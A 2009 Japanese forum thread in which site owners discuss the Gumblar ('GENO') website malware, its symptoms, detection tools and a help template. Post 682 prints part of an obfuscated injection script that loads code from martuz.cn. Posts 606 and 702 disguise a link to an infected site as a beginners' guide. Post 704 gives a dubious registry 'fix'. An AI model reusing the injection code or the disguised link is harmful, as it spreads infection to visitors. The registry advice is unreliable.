590GENO:2009/05/17(日) 19:22:54 ID:z1fSRVRF0
>>566
自分もそうなったけど、一回DLしたのを削除して
別リンクタイプのAvast!.exeをインストールしたら出来た
591GENO:2009/05/17(日) 19:23:51 ID:MtHQx4iT0
というか、こんな親切にしてもらっておいて
その程度のことで不信感やら、愚痴こぼすとかどんだけ厚かましいのよ。

神経疑うわ。
592GENO:2009/05/17(日) 19:25:25 ID:80ltjoJs0
速報用に
●ニフィティ自体には問題ないです。
 ポータルサイトやスキャンページを見ても問題ないので落ち着いて
●チェッカーの数値が高くてもただのJavascriptに反応している場合が有ります
 一旦安全な手段でソースを確認しましょう

も入れておいたらどうさね
593geno:2009/05/17(日) 19:27:52 ID:Il+SPzcZO
>>592
ニ フィ ティになってる

今冷静にあちこちスレみたら、ニフティに委託管理?されてる鯖だかサイトが感染しただけだそうです
ニフティ本体は無事だって
594GENO:2009/05/17(日) 19:28:02 ID:l5MsZZlCO
>>575
それ、gumblar.cnとmartuz.cnを入れてチェックしたら危険度0パーセントだったよ。
595GENO:2009/05/17(日) 19:29:08 ID:jMmmwjr00
>>592
ソースの見方があったほうがいいね
596GENO:2009/05/17(日) 19:29:30 ID:9zPuFtPL0
>>592
いいね特に下
ただのjavaスクリプト記述にファビョられると本当に辛い
597GENO:2009/05/17(日) 19:29:33 ID:l3+sVDuZ0
更新日が更新日は2004年8月5日でも
サイズが1.29 KB (1,323 バイト) なら
アウトでしょうか? 他は白でしたが……
598GENO:2009/05/17(日) 19:30:16 ID:z1fSRVRF0
>>597
アウト!
599GENO:2009/05/17(日) 19:30:49 ID:aTSY2Ugx0
600geno:2009/05/17(日) 19:30:57 ID:P4y+Uyoo0
>>554
ありがとうございます。直してみました。
>>580の画像をwikiにお借りします。やっぱり絵があると分かりやすいので
601げの:2009/05/17(日) 19:31:01 ID:UOLDvSOuO
>>597
アウッ
602GENO:2009/05/17(日) 19:31:09 ID:jMmmwjr00
>>594
それらは、「悪意のあるコードによってアクセスさせられる先」。
GENOチェッカーはあくまで「悪意のあるコード」があるかどうかの可能性を見るんだよ
603GENO:2009/05/17(日) 19:31:32 ID:y3bgb5V70
リンク先のサイトのソースに以下の記述があった。
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>

まとめにはjavascript(unescape、eval、replaceが入っていたら黒)が埋め込まれる、
と記述されていたが、これは黒?
604geno:2009/05/17(日) 19:33:03 ID:YCs+qKMBO
>>590
>>566じゃないけどありがとう
参考にさせてもらいます
605geno:2009/05/17(日) 19:33:22 ID:LPAkDXp60
質問・判定スレでも作ったら?
606GEnO:2009/05/17(日) 19:33:42 ID:eGBOhN1B0
同人サイト向け・通称「GENOウイルス」対策まとめ
http://www31.atwiki.jp/doujin_vinfo/

■何をしたらいいか分からない人はまずここを見る。
http://www.seibidoshuppan.co.jp/
何をすれば良いか良く分からない人用のまとめ

■よくある質問>>1
■主な症状 >>5
■自ジャンルで発見した場合
→まとめページを見て、重複がない場合は>>4

※まとめサイトの方が拾いやすいように、
まとめサイトへの報告他は、必ず>>1
アンカーを入れて報告してください。

GENOウィルスことGumblarの報告してくれてるブログ
ttp://www3.atword.jp/gnome/tag/zlkon/
あと非同人向けまとめサイト
ttp://www29.atwiki.jp/geno/
607geno:2009/05/17(日) 19:33:45 ID:ugI/Fqnf0
>>603
白じゃね?普通に考えて
608geno:2009/05/17(日) 19:33:49 ID:Ecd/3Efh0
>>603
なんで分からないのにソース見たりとかしてるんだよ
609GENO:2009/05/17(日) 19:33:54 ID:94GIamPZ0
>>603
うねすけーぷ入ってるからアウトじゃね?
610geno:2009/05/17(日) 19:34:29 ID:NKT7xx/V0
>>603

google-analytics.comをググってみるとかしないのか?
611GENO:2009/05/17(日) 19:35:39 ID:gDQ79NiQ0
ぐぐるの解析じゃね?
612GENO:2009/05/17(日) 19:37:06 ID:2mQ9YNtD0
>>611
ドラクエ79か…
613GENO:2009/05/17(日) 19:37:12 ID:aTSY2Ugx0
>>606
悪意のある改変をするやつはくたばってください
614名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 19:37:38 ID:SsvMmXpe0
とりあえず感染してる、ってサイトのソースを見れば、大体どういうのがまずいのかわかると思うよ。
615GENO:2009/05/17(日) 19:37:48 ID:owV3p7qMO
>>583も言ってるけど何で皆avavtなの?
まとめサイトにあるバスター2009とかが入ってればおkでしょ?
それともウイルス対策ソフトそのものを持ってなかったとか?
616GENO:2009/05/17(日) 19:37:51 ID:2j6DSfNlO
>>603
アクセス解析だよ
その程度もわからないならソース覗かないほうがいい
617GENO:2009/05/17(日) 19:38:07 ID:94GIamPZ0
うはwww俺恥ずかしいwwww
冷静になって見たら>>603>>610>>610も言ってるみたいに安全なやつだわwwwまじすまんwwww
618GENO:2009/05/17(日) 19:38:34 ID:jMmmwjr00
悪意のあるコードはこのように難読化されてる
ttp://www31.atwiki.jp/doujin_vinfo?cmd=upload&act=open&pageid=16&file=www.dotup.org33103.jpg
ttp://sakuratan.ddo.jp/imgboard/img-box/img20090517073301.jpg

Wikiの判定基準もあいまいか……?
619GENO:2009/05/17(日) 19:38:37 ID:CLX5dzsU0
>>606
のwww.seibidoshuppan.co.jpは踏むなよー
620GENO:2009/05/17(日) 19:38:47 ID:TLVlDCUsO
>>493
ニコでも注意動画出来てた

ttp://nicovideo.jp/watch/nm7062983
621GENO:2009/05/17(日) 19:39:29 ID:CLX5dzsU0
うわ、リンクにならないようにhttp://抜いたのに専ブラだとこれでもリンクになるのか…orz
ほんとにすまん…
622GENO:2009/05/17(日) 19:39:36 ID:80ltjoJs0
>>606
やべええええwwwww
貴様わざとやっているのかw

感染サイトがわかんない人用wikiのとこに張られてるから踏むなよ!

ちなみに<script language=javascript>で始まってて
↓こんなんとか
-22t-75z-2e-63n-2f-76-69-64-2f-3f-69d-3d-22+j+-22-3e-3
↓こんなんとか
"22"61rtuz"2ecn"2fvid"2f"3fid"3d"22+j"2b"22"3e"3c"5c"2fscr

が</head>ここらへん<body>に入ってんのはだいたいアウトね
623geno:2009/05/17(日) 19:40:21 ID:hqnP7TwX0
>>580
一つだけ、ソースチェッカーで調べろってのは少し変えたほうがいいような。。。
flashとadobe readerが最新版でreaderのスクリプト切れば今のところ大丈夫みたいだし。

自分のサイトくらいはソースチェッカー無くても調べるよう促すべきだと思う。ブラウザでスクリプト切れば感染しないだろ。
あのサイトの転送量増えて重くなってるみたいだしむやみに負担かけないほうが良いと思うぞ。
624GENO:2009/05/17(日) 19:41:46 ID:EBSzFkV20
>>621
え、これでもなる専ブラあるんだ
625GENO:2009/05/17(日) 19:41:52 ID:1mIw8Ych0
>>615
とりあえず一番対応が早かったからでは?

まあ自分は入れてないわけだが
ZEROとカペラでチェックしたし
626geno:2009/05/17(日) 19:42:08 ID:AiED3JfY0
>>614 NoScriptいれてる火狐なら入っても成美堂はいっても大丈夫かな?
627GENO:2009/05/17(日) 19:42:24 ID:Qag8fz260
せいびどうしゅおおあんふんじゃった。・・
628GENO:2009/05/17(日) 19:42:35 ID:WZQN5UgD0
>>606
死ね
氏ねじゃなくて死ね
629geno:2009/05/17(日) 19:42:45 ID:0di56Z1w0
>>606
二個目のリンク、ウイルス感染サイト
630geno:2009/05/17(日) 19:44:03 ID:vnOISF+R0
昼前にチェックした時は角川書店のトップが1000%汚染で
開いた口が塞がらなかったが、
今チェックしたら40パーセントまで下がっていた。
チェッカーの判定基準が変わったのか?
角川の中の人がサイトを弄ったのか?
631GENO:2009/05/17(日) 19:45:30 ID:owV3p7qMO
>>627
もちつけ
冷静になってできることをやるんだ
632geno:2009/05/17(日) 19:46:31 ID:YCs+qKMBO
>>606
お前が感染しろボケ
633GENO:2009/05/17(日) 19:46:36 ID:2mQ9YNtD0
flash切るのも入れたほうがいいんじゃない?
後出来ればiframeも
634GENO:2009/05/17(日) 19:46:45 ID:mWYIOMjx0
vistaってまだ大丈夫?
635GENO:2009/05/17(日) 19:46:48 ID:28MNX8DRO
PC切って携帯で情報収集しなよ
636GENO:2009/05/17(日) 19:46:56 ID:EBSzFkV20
>>622
こういうパターンって、正規表現とかでチェック基準にできないものかね?
637GENO:2009/05/17(日) 19:47:26 ID:bIuv7HCu0
せいびどう踏んだ奴、感染チェックもせずに
クリーンインスコとかあほな真似はすんなよ
638geno:2009/05/17(日) 19:48:07 ID:eIexCVOnO
>>583
パソコンにバスター2009とavast両方導入してるんだけど、どっちかアンインストールしたほうがいい?
639げの:2009/05/17(日) 19:48:48 ID:qJcYyBqhO
なんでテレビのニュースで取り上げられないんだろ。
640GENO:2009/05/17(日) 19:49:33 ID:7bIAj8MN0
ウイルスセキュリティソフト二個入れるとか
641GENO:2009/05/17(日) 19:49:45 ID:cswFnkkL0
>>639
テレビ大好きな情弱が見てもワケワカメだろが
642GENO:2009/05/17(日) 19:49:56 ID:z1fSRVRF0
>>636
できたとしても更新の早いウィルスだから下手にチェック基準をもうけると
「ここでクリアだから大丈夫!」と思って亜種に対応できなくなる恐れが出てくるかもしれない
643GENO:2009/05/17(日) 19:51:36 ID:J+Wxh1ww0
606って、ずっと感染URL一覧にして晒せって言い続けてた奴だろ
そのあと「検体」って言葉覚えて、「検体欲しいからよこせ」ってわめいてた奴
644GENO:2009/05/17(日) 19:52:58 ID:DOJfiSq80
>>639
・リアルのウイルスでそれどころではない
・テレビの層ははネットが良く分からない
645GENO:2009/05/17(日) 19:53:15 ID:8/Rp5OOj0
情報が錯綜しているから、とりあえず次スレ用テンプレ作ってみた。
貼っておくから、適当に修正して使ってください。
646GENO:2009/05/17(日) 19:53:35 ID:25KcJTAx0
>>623
じゃ、この際イラストから下ばっさり切っちゃったほうが良いかね?
確かに画像サイズでかいんじゃページにも迷惑だよな・・・
647GENO:2009/05/17(日) 19:53:35 ID:Qag8fz260
せいびどう踏んでしまったけれど
sqlsodbc.chmは変化なし
cmd.exe・regedit.exeはどちらも立ち上がる…

当方XP 対策はバスターは2009最新にアップデートしてるくらいで jsは切ってない
HPは持ってるけど更新予定なし
これから変化があるんだろうか…
648GENO テンプレ1:2009/05/17(日) 19:53:57 ID:8/Rp5OOj0
1----------------------------------

新種のコンピュータウィルスが流行っています。
感染サイトを見ただけで感染発症し、大半のアンチウィルスソフトで検知されません。
変化が早く、一部の検知可能なソフトも最新型には対応できていない状況です。
全ジャンルでサイト管理人・閲覧者に感染チェックを推奨します。

特にサイト管理人は二次被害を起こしてしまいますので、早急な確認が望ましいと思われます。


■同人サイト向け・通称「GENOウイルス」対策まとめ
http://www31.atwiki.jp/doujin_vinfo/

■何をしたらいいか分からない人はまずここを見る。
http://www40.atwiki.jp/gegegeno/
何をすれば良いか良く分からない人用のまとめ

【注意!!】まとめサイトへの報告は、まとめサイトの人が分かりやすいように、>>1へアンカーをつけてください。

前スレ
【管理も】同人サイト・GENOウィルス注意5【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242540064/


・まずは、何をしたらいいの? >>2
・主な症状>>3
・自ジャンルで感染を見つけてしまった >>4
・よくある質問 >>5
649GENO:2009/05/17(日) 19:54:01 ID:28MNX8DRO
>>638
おま…競合すんだろ
ウイルス感染する前にパソ壊れちゃうよ
650GENO テンプレ2:2009/05/17(日) 19:54:41 ID:8/Rp5OOj0
2----------------------------------------

■絵で見て分かる簡単な画像
ttp://ranobe.com/up/src/up360283.jpg

■絵で見て分かる 更に画像
ttp://ranobe.com/up/src/up360236.gif

※自分が感染していないかをチェックと
自分のサイトが感染していないかチェックをしましょう

1、自分が感染していないかチェック
ttp://www31.atwiki.jp/doujin_vinfo/pages/12.html

2、サイト管理人は、自サイトが感染していないかチェック
ttp://www31.atwiki.jp/doujin_vinfo/pages/16.html
651Geno:2009/05/17(日) 19:54:57 ID:FRwX3w880
XPで感染したやつざまぁwwwww
652名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 19:55:09 ID:MmWu1w5h0
うちのノートン先生はドジッ子だから信用できない
653GENO:2009/05/17(日) 19:55:55 ID:Eqx9T9080
じゃあ俺はGoogleChromeに乗り換えるぜ!
654GENO テンプレ3:2009/05/17(日) 19:56:32 ID:UEpJMk9T0
3------------------------------------
主な症状

・感染後にFTPに接続するとログイン情報が送信され勝手にFTP上のファイルを改竄される
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集している恐れ
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD
655geno:2009/05/17(日) 19:56:52 ID:9wncY9JGO
>>643
スレ住人がプログラマーごっこに付き合ってあげなかったから…
656同人:2009/05/17(日) 19:57:03 ID:l5MsZZlCO
>>602
納得しました。
ありがとうございます。
657GENO テンプレ4:2009/05/17(日) 19:57:43 ID:UEpJMk9T0
【よくある質問】
Q:感染するとどうなるの?
A:あなたのパソコンに侵入したウイルスは、
 FTPによる通信を行った時点でFTPのIDとパスワードを盗みます。
 そうなるとFTPでアップロードしたサイトのファイルに悪意を持ったコードが勝手に挿入され、
 そのサイトを見た人を感染させます。
 その他の個人情報が盗まれるのかどうかはまだわかっていません。

Q:ウィルスソフトが反応していないから大丈夫だよね?
A:マルウェアは対策が遅れる事があり、セキュリティソフトも対策が間に合っていない場合があります。
 又、対策したと思われても、亜流が常に出てくる可能性もあります。

Q:VistaとMacは感染しないの?
A:某企業サイトでの発見直後はVista、Macには感染しないと言われましたが
 新種も現れており安心できる状況ではありません。

Q:閲覧先が、感染しているかも!
ttp://www31.atwiki.jp/doujin_vinfo/pages/16.html 参考。

Q:〜〜が感染しているって本当??
A:誤報が先走り、実際の感染確認が出ていないケースがたびたびあります。
 例)ニフティ(ポータルサイトやスキャンページを見ても問題ないので落ち着いて)

Q:閲覧先のサイトに変なコードがあるんだけど!
A:元々記載されている、スプリクトの可能性も高いです。まずは落ち着いて。
 一旦安全な手段でソースを確認しましょう

Q:とにかく何をしたらいいの?
A:>>2

Q:素人なので、とにかく何もかもが分からない。
A:http://www40.atwiki.jp/gegegeno/
658GENO:2009/05/17(日) 19:57:48 ID:DOJfiSq80
>>647
一応いつでもクリーンインストール出来るようにバックアップ取って
静観してはどうか

状況に変化があったら投下お願い
659GENO:2009/05/17(日) 19:57:53 ID:bIuv7HCu0
>>648
テンプレ1

> 感染サイトを見ただけで感染発症し、

これだと感染サイトを見たら「必ず」感染発症すると考えるバカが出る
「感染サイトを見ただけで感染・発症する危険があり」
がいいんじゃね?
660GENO テンプレ5:2009/05/17(日) 19:58:25 ID:UEpJMk9T0
5----------------------------------
当スレでは感染報告については、注意喚起の観点から

・感染が認められたジャンル名

のみ報告OKです。
感染報告をする際は、ジャンル名・ジャンル内シリーズ名など
伏字・略称にせず、わかりやすく書いてくだささい。

晒しやウォチ、風評被害を防ぐため、個人サイトを特定できる形で話題に出すのはNGです。
また、アドレス晒しは、踏むとマジで危ないので絶対厳禁。

※ 対策済みの所も注意喚起の意味で、ジャンル名記載が残されています。
※ 報告は、まとめサイトの人が分かりやすいように、>>1へアンカーをつけてください。
661GENO:2009/05/17(日) 19:59:33 ID:KYjyDRzp0
>>647
バスターのログでフィッシング詐欺対策見てみて
ブロックされてない?
662GENO:2009/05/17(日) 20:01:29 ID:4FKymPog0
>>1
「小林製薬や旅行代理店等、大手サイトだけでなく同人サイトにも広まっています。」
の記述は、

「製薬会社、出版社、旅行代理店など企業サイト、ゲーム会社を始め
個人制作のファンサイト、サーチ、イラストや小説の同人サイトにも感染が広がっています」

あたりに変えてはいかがでしょうか
そろそろ小林製薬だけ名前が出ているのも可哀相ではないかという気がしてきた
663GENO:2009/05/17(日) 20:01:58 ID:Gshx1MFT0
「私PC詳しくないけどうちVISTAだから安心!」っていってる女性向けサイトを幾つか見たんだが
VISTAなら安全!ってどこかに宣言でた?
「今のところ大丈夫らしく感染例がないが亜種が出たら危険」ってレベルだと思ってたんだが
664GENO:2009/05/17(日) 20:02:16 ID:bIuv7HCu0
>>657

> Q:閲覧先が、感染しているかも!
> ttp://www31.atwiki.jp/doujin_vinfo/pages/16.html 参考。

これだと、第一サイト管理者向けのページだし、
ページを開かずにソースを調べる方法がわからない

ページを開かずにソースを調べる方法はWikiには載せない方針なので
スレ上に明記しなきゃだね
665GENO テンプレ5:2009/05/17(日) 20:02:26 ID:AgRLWFC10
連投規制で接続しなおした為ID途中で変わっています。

テンプレ たたき台

1 >>648は、>>659がいいですね。>>659に修正
2 >>650
3 >>654
4 >>657
5 >>660

ちなみに、このスレは、本来は連番6だと思うので、次スレは7で



666GENO:2009/05/17(日) 20:03:10 ID:Nq7oPlW00
GENOウィルスの親玉にアパッチ打とうぜwwwwwwwwww  
http://takeshima.2ch.net/test/read.cgi/news4vip/1242547793/
 
667GE:2009/05/17(日) 20:03:46 ID:gL3wqKiX0
>>663

ヤフーでVISTAやMACは感染してないとか記事でてた。
668GENO テンプレ5:2009/05/17(日) 20:04:09 ID:AgRLWFC10
ソースチェックをテンプレに入れるかも、ご意見お願いします。
どうもソースチェックで、誤解している人も出てきそうなので、
テンプレに入れずに、必要時誘導の方がいいのか、それとも入れてしまうか。

http://wepawet.cs.ucsb.edu/ ソースチェック
ここで「URL」と書かれている右のフォームに感染が疑われるURLを入力。
「Resource type」のチェックボックスは「JavaScript/PDF」にチェックを入れ、
「Submit for analysis」をクリック。
すると解析結果が出るので、Ctrl+Fをタイプしてページ内を「gumblar.cn」「martuz.cn」で検索。

GENOウィルスチェッカー
http://geno.2ch.tc/ URLチェック

※あくまで参考としてください。
669ge:2009/05/17(日) 20:05:31 ID:403rjvJn0
Vistaも対策取ってなきゃアウトですよー
670GENO:2009/05/17(日) 20:05:41 ID:o+iH4m/E0
>>647
FlashPlyer(10.0.22.87)とReader(9.1.1)を最新バージョンにしてる?
そしたら多分大丈夫。多分。
671geno:2009/05/17(日) 20:05:51 ID:YTQWI9820
>>663
>>667
今のところ、でな。663の認識で合ってる。
あとUACが有効になっていることが条件。
672geno:2009/05/17(日) 20:06:04 ID:CVXgkb/j0
ジェノサイドウィルスの略かと思ったら違うのか
673geno:2009/05/17(日) 20:07:40 ID:quuri9v60
>>654
・再起動時にBSOD

・再起動時に正常に起動できず、画面が真っ青になって警告が表示される(BSOD)

のほうがいいのでは?
674geno:2009/05/17(日) 20:07:44 ID:Tqfbaity0
>>493,>>657
スプリクトになってるぞーw
675GENO テンプレ5:2009/05/17(日) 20:09:19 ID:AgRLWFC10
>>662
了解。その方がよさそう

>>664
こんな感じ?

1.閲覧先のソースにおかしな記述がないか確認する

2.感染している場合の症状

.htmlファイルのbodyタグ直前、.phpファイルの先頭、.jsファイルの末尾に覚えのない
難読化されたjavascript(unescape、eval、replaceが入っていたら黒)が埋め込まれる
「images」ディレクトリ内に「images.php」というファイルが生成される
 感染サイトのソースコード例(画像)

【サイトを確認する際の注意点】
※レンタルサーバーを使っている時に自動挿入される広告やアクセス解析の
記述と間違えないように(きちんと読めば簡単に広告やアク解だとすぐ分かる)

※参考で、ソースチェックURL >>668あたりの記述
676geno:2009/05/17(日) 20:11:28 ID:hqnP7TwX0
>>623
まとめのURLを上に持ってくるのはどうかな?
不安ならまずここで確認しろってまとめのリンクに誘導する。

このくらいの意見なんだがどうでしょう。
説明はかなりわかりやすいよ。
677GENO:2009/05/17(日) 20:12:43 ID:WZQN5UgD0
テンプレ案乙です
>>668のウイルスチェッカーの下に以下の文を入れた方が良いかも
・JavaScriptを使っているページのURLを入れると0%以外の数値が出ます
GENOウィルスはJavaScriptに関係するウィルスのため、0%ならひとまず安全です
678geno:2009/05/17(日) 20:12:48 ID:hqnP7TwX0
>>676>>646へのレス
679GENO:2009/05/17(日) 20:12:59 ID:H2FcPRpe0
さっき職場のサイト関係担当の人に伝えて一応対策してきたー。

特定のジャンルの同人サイトだけしか感染しないとか思ってる人がいてびっくりしたんだがそういう認識なのだろうか..
680 ◆NAO/2MXDEk :2009/05/17(日) 20:13:02 ID:x2Ev6fa50
こんばんは。
ウイルスチェッカーが何たらって話で来ました。

http://qb5.2ch.net/test/read.cgi/operate/1241361889/176-180

で、誰かkwsk話をばしてくれませんか。
681geno:2009/05/17(日) 20:13:28 ID:U/BebqKb0
>>672
あながち間違ってはいない
682GENO:2009/05/17(日) 20:14:13 ID:O5Y1gBq2O
規制されてるんで携帯からスマン

<script language=javascript><!--
(function(){var
omJo=('var_20_61_3d_22Scri_70tE_6eg_69ne_22_2c_62_3d_22Ver_73ion()
【10行くらい同じ様な文字の羅列】
3bdocume_6et_2ewri_74e(_22_3cs_63ri_70t_20src_3d_2f_2f_6da_72_22+_22_74_75z_
2ecn_2fvi_64_2f_3fid_3d_22_2bj+_22_3e_3c_5c_2fs_63_72i
_70t_3e_22)_3b_7d').replace(/_/g,'%');var
FiGY=unescape(omJo);eval(FiGY)})();
--></script><body>

これアウト?
GENOウイルスチェッカーで変更前は1000%で危険
今は0%で安全って出てるんだが
683GENO:2009/05/17(日) 20:14:35 ID:3NBqJ0wC0
684名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 20:14:55 ID:AkQ/da7U0
>>682
セーフ
685GENO:2009/05/17(日) 20:16:08 ID:aYWY2y+O0
>>679
一般の認識では
ウィルスに感染する=違法だったりろくな事してない
Winny等で拾ってくるオタクざまぁだったりするんじゃないかな
686geno:2009/05/17(日) 20:16:12 ID:PgSyQijF0
今回の騒動でavast!を入れて、このスレを見たら怒られた人へ

■2chのスレを2chブラウザで開くとウイルスを検出する
ただのテキストのコードなのでウイルスに感染することはない、誤検出しないようにするには
1. avast!の標準シールドの感度を [普通] に設定 or avast!の標準シールドの例外設定に
2chブラウザのdatフォルダを設定
2. 2chブラウザでWebシールドを使わないように設定
ttp://ansitu.xrea.jp/guidance/?Trap#avast

他のウィルスソフトも同じように怒られるかもしれないけど、ウィルスじゃないから
落ち着いて、自分のウィルスソフトのスレにでも行って対応を探してみ
687GENO テンプレ:2009/05/17(日) 20:16:13 ID:z0Wd4A3c0
>>674
ごめんw


次スレテンプレ たたき台

1 >>648は、>>659がいいですね。>>659に修正 >>662に修正
2 >>650
3 >>654 >>673に修正 「※全く同じ動作になるとは限りません」も追記した方がよさげ
4 >>657 >>674 誤字修正要orz >>664 >>675
5 >>660


4の>>675だけど、閲覧先が感染しているか確認するのは
自力でソース見てチェック出来る人がやった方がいいと思うから
>>668の記述は除いてもいい気もします。ご意見お願いします。
688GENO:2009/05/17(日) 20:16:54 ID:tWecBrH+0
>>668>>675
うーん、「テンプレ4」には「閲覧先が、感染しているかも!」っていう項目入れないで、
テンプレの一番最後に、ソースチェック関連を持ってくるのはどうかね

「GENOウィルスチェッカーは大まかな危険を知るためのもの、
下2つは(読める人が)特有のコードがあるかどうか判断する為のもの、
http://wepawet.cs.ucsb.edu/ ソースチェック は……(誰かお願いします)」
ってことも書いて

●GENOウィルスチェッカー
 http://geno.2ch.tc/

http://wepawet.cs.ucsb.edu/ ソースチェック
 ここで「URL」と書かれている右のフォームに感染が疑われるURLを入力。
 「Resource type」のチェックボックスは「JavaScript/PDF」にチェックを入れ、
 「Submit for analysis」をクリック。
 すると解析結果が出るので、Ctrl+Fをタイプしてページ内を「gumblar.cn」「martuz.cn」で検索。

●ソースチェッカーオンライン(http://so.7walker.net/guide.php )
 右側に表示されるソースを見て、Wikiの「サイト管理人向け」に
 あるようなおかしなコードの有無を調べる。
 ※ソース以外の情報(左下の「安全度」等)は一切無視する。

●手動
 調べたいリンク先を右クリックなどから保存する。
 保存されたHTMLファイルを右クリックなどから
 メモ帳などのテキストエディタで開き、Wikiの「サイト管理人向け」に
 あるようなおかしなコードの有無を調べる。
689GENO:2009/05/17(日) 20:18:01 ID:Qag8fz260
>>658
了解
相変わらずsqlsodbc.chmも変化なし cmd.exe・regedit.exeどちらも立ち上がるし
CPUが食われてるかんじもない

>>661
「最近のセキュリティレポート」→「ログ(履歴)」で、フィッシング詐欺対策を選んで表示ボタンでいいのかな?
そこで出てきたものなら、今日は02:35にブロックした記録があるのみ
せいびどうサイトを踏んだのは19:40頃だから、レポートには記録されてない様子
(せいびどうサイトが表示されたときもとくにバスターに変化はなかった)

>>670
AdobeFlashPlyerは(10.0.22.87)最新 だけど、AdobeReader は7.0(2004/12)のもの…
690 ◆NAO/2MXDEk :2009/05/17(日) 20:18:06 ID:x2Ev6fa50
>>683
geno.2ch.tc の転送量がキツいから、
「鯖貸してちょ」って話だと思ったんすけど、
違ったんすかね。

   =≡=  ∧_∧  現在待機中
    /    (・∀・ )
  〆      \\c  ) ∈≡∋
   ||  γ ⌒ヽヽコノ   ||
   || .|   |:::|∪〓.  ||
  ./|\人 _.ノノ _||_.  /|\
691geno:2009/05/17(日) 20:18:18 ID:JB4/Lb/F0
該当サイト管理者がどんな対処をするか見ものだな
692geno:2009/05/17(日) 20:18:20 ID:PgSyQijF0
>>682
unescape、eval、replaceが全部あるからアウトじゃね?
693GENO:2009/05/17(日) 20:18:33 ID:poH3PCwI0
>>682
おそらくアウト
それ暗号化されてるのでぱっと見ては分からないと思いますが
http://wepawet.cs.ucsb.edu/ こっちの
ソースチェックにかければgumblar.cnなんかも見えると思います。

今回の感染サイトはほとんどそういった文字列が入ってます。
694GENO:2009/05/17(日) 20:19:04 ID:gqW0H4cm0
これ、感染してからサイト弄られるのってどれくらいのラグがあるんだろう?
適当にチェックして、サイトも大丈夫!って思ってる人のサイトがその後化けるとかあったら怖いなと

FTPいじったら即効でやられると考えていいのかな?
695GENO テンプレ:2009/05/17(日) 20:21:02 ID:z0Wd4A3c0
>>688
あ、その方がいいかもな

となると、こんな感じ?

次スレテンプレ たたき台

1 >>648は、>>659 >>659に修正 >>662に修正 
        アンカーに>>6ソースチェック関係追加
2 >>650
3 >>654 >>673に修正 「※全く同じ動作になるとは限りません」も追記した方がよさげ
4 >>657 >>674 誤字修正要orz Q:閲覧先が、感染しているかも!を外す。
5 >>660
6 >>688 ソースチェック関係追加
696GENO:2009/05/17(日) 20:21:23 ID:8czClvti0
早速感染したどじっ子な僕がきますた(^ω^)
697geno:2009/05/17(日) 20:23:00 ID:PgSyQijF0
>>690
ここすんげーカオスだからw
そこのチェッカーの中の人に>>680のスレに行ってもらった方がいいと思いますよ
698GENO:2009/05/17(日) 20:23:54 ID:Mv+Un+zhO
>>682
確実にアウトなのにチェッカー反応しなかった、ってのは怖いな
699GENO:2009/05/17(日) 20:24:31 ID:aTSY2Ugx0
チェッカーの中の人は今セキュ板にいるのかな?
こっちも見てるといいんだけど
700GENO:2009/05/17(日) 20:24:50 ID:H/MvH62k0
運営に助けを求めたのは誰だ?ちゃんと説明してやれよ
701 ◆NAO/2MXDEk :2009/05/17(日) 20:25:54 ID:x2Ev6fa50
なるほど
んじゃ、◆XcxlmnqGqUさん、取り敢えず以下のスレに来るか、
この板のこの系統のスレで反応を下さい。

>以下のスレ
幸せサーバープロジェクト 「アイデア・技術のある人募集中」★3
http://qb5.2ch.net/test/read.cgi/operate/1241361889/

後、メールアドレスを一本用意しといてもらえると幸いです。
702GEnO:2009/05/17(日) 20:26:14 ID:eGBOhN1B0
同人サイト向け・通称「GENOウイルス」対策まとめ
http://www31.atwiki.jp/doujin_vinfo/

■何をしたらいいか分からない人はまずここを見る。
http://www.seibidoshuppan.co.jp/
何をすれば良いか良く分からない人用のまとめ

■よくある質問>>1
■主な症状 >>5
■自ジャンルで発見した場合
→まとめページを見て、重複がない場合は>>4

※まとめサイトの方が拾いやすいように、
まとめサイトへの報告他は、必ず>>1
アンカーを入れて報告してください。

GENOウィルスことGumblarの報告してくれてるブログ
ttp://www3.atword.jp/gnome/tag/zlkon/
あと非同人向けまとめサイト
ttp://www29.atwiki.jp/geno/
703げげげのげ:2009/05/17(日) 20:26:24 ID:YUZWQXNmO
>>696
えらいね、あとはクリーンインストールだね
704応急処置:2009/05/17(日) 20:26:34 ID:qOvxNlFx0
このウイルスは以下のレジストリキーを改変することが分かりました
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
再起動時にブルースクリーンになるのはこの為です

レジストリエディタを開いて以下のキーを見つけます
HKEY_LOCAL_MACHINE

SOFTWARE

Microsoft

Windows NT

CurrentVersion

Winlogon

このWinlogonという名前にマウスカーソルを合わせて右クリックします
出てきたメニューに「アクセスの許可」というものがありますのでこれをクリックしてください
名前の中にある「Administrators」をクリックしてアクセス許可の中にある「フル コントロール」の横の「拒否」にチェックを入れます
最後に「OK」をクリックしてレジストリエディタを閉じてください
作業はこれで終わりです

これで再起動時のブルースクリーンから解放されます
705GENO:2009/05/17(日) 20:26:53 ID:jOH/MpPz0
Vistaならノーガードで余裕
ttp://ranobe.com/up/src/up360292.png
706GENO:2009/05/17(日) 20:28:40 ID:7pbiQCXC0


>>702

は絶対踏むなよ
707geno:2009/05/17(日) 20:29:04 ID:P4y+Uyoo0

何をしたらいいか分からないひと用のwikiは対策まとめウィキのリンクから行くようにしてください。
seibidoshuppanは絶対にクリックしないこと。
よりによって初心者用を騙るとか最悪だ
708GENO:2009/05/17(日) 20:29:08 ID:ksg3AVup0
お前ほんとやめろって・・・
709 :2009/05/17(日) 20:29:21 ID:tWecBrH+0
>>702通報すっぞゴルァ
710GENO:2009/05/17(日) 20:29:37 ID:MmWu1w5h0
いいかげんにしてよ
711GENO:2009/05/17(日) 20:29:54 ID:bY7I82yN0
チェッカーで1000%がでた顔見知りのサイト管理人さんには
